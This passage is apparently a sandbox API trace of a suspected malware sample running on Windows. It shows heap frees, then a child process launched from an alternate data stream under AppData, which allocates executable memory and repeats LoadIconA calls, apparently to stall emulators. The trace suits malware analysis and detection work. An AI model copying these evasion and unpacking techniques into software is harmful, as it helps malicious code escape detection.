(in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715720 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717708 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7177a0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717848 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7178f8 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7179a0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717a38 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717ae0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7157c0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715860 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715900 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7159a0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715a40 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717b78 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717c38 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717ce0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717d88 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719c20 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717e30 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719cd8 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717ed8 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717f80 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718028 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719d98 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719e48 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715ae0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715b80 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715c20 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7180d0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715cc0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718178 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719ef8 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719fb0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718220 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7182c8 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715d60 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715e00 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718370 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718418 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715ea0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7184c0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715f40 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a068 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715fe0 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718568 | out: hHeap=0x6e0000) returned 1 [0062.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718610 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7186b8 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718760 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718808 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7188b0 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718958 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718a00 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718aa8 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716080 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716120 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7161c0 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718b50 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718bf8 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716260 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a120 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a1d8 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716300 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7163a0 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716440 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7164e0 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a290 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716580 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716620 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718ca0 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718d48 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a340 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7166c0 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716760 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a3d8 | out: hHeap=0x6e0000) returned 1 [0062.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716800 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718df0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a490 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a540 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7168a0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718e98 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716940 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718f40 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7169e0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x718fe8 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719090 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716a80 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716b20 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716bc0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716c60 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716d00 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716da0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a5f0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a6a8 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716e40 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a740 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716ee0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719138 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x716f80 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7191e0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719288 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717020 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7170c0 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717160 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a7d8 | out: hHeap=0x6e0000) returned 1 [0062.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719330 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717200 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7172a0 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a870 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717340 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a920 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7173e0 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717480 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717520 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7175c0 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7193d8 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717660 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719480 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719528 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a9e8 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71aa88 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7195d0 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719678 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71ab28 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71dc30 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719720 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71dce0 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71abc8 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7197c8 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719870 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71ac68 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71ad08 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71ada8 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719918 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71dd90 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71ae48 | out: hHeap=0x6e0000) returned 1 [0062.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71aee8 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71af88 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b028 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b0c8 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7199c0 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b168 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b208 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b2a8 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b348 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b3e8 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719a68 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b488 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b528 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b5c8 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b668 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b708 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x719b10 | out: hHeap=0x6e0000) returned 1 [0062.156] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71de60 | out: hHeap=0x6e0000) returned 1 [0062.984] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) Process: id = "2" image_name = "boot:bin" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\boot:bin" page_root = "0x48d6a000" os_pid = "0x76c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb40" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin\" -r" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x7a8 [0063.054] LoadCursorFromFileA (lpFileName="rtjuht8reht8wehrt98wh") returned 0x0 [0063.106] GetLastError () returned 0x2 [0063.107] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0063.107] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0063.107] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x4fe9e8 | out: phkResult=0x4fe9e8*=0x7a) returned 0x0 [0063.108] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0063.108] RegQueryValueExA (in: hKey=0x7a, lpValueName="", lpReserved=0x0, lpType=0x18ff70, lpData=0x18fea4, lpcbData=0x4fe6b0*=0xc8 | out: lpType=0x18ff70*=0x1, lpData="IEnumConnections", lpcbData=0x4fe6b0*=0x11) returned 0x0 [0063.108] LoadLibraryExA (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0063.108] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0063.108] VirtualAlloc (lpAddress=0x0, dwSize=0xf200, flAllocationType=0x3000, flProtect=0x40) returned 0x210000 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.109] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.110] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.111] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.112] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.113] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0063.114] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 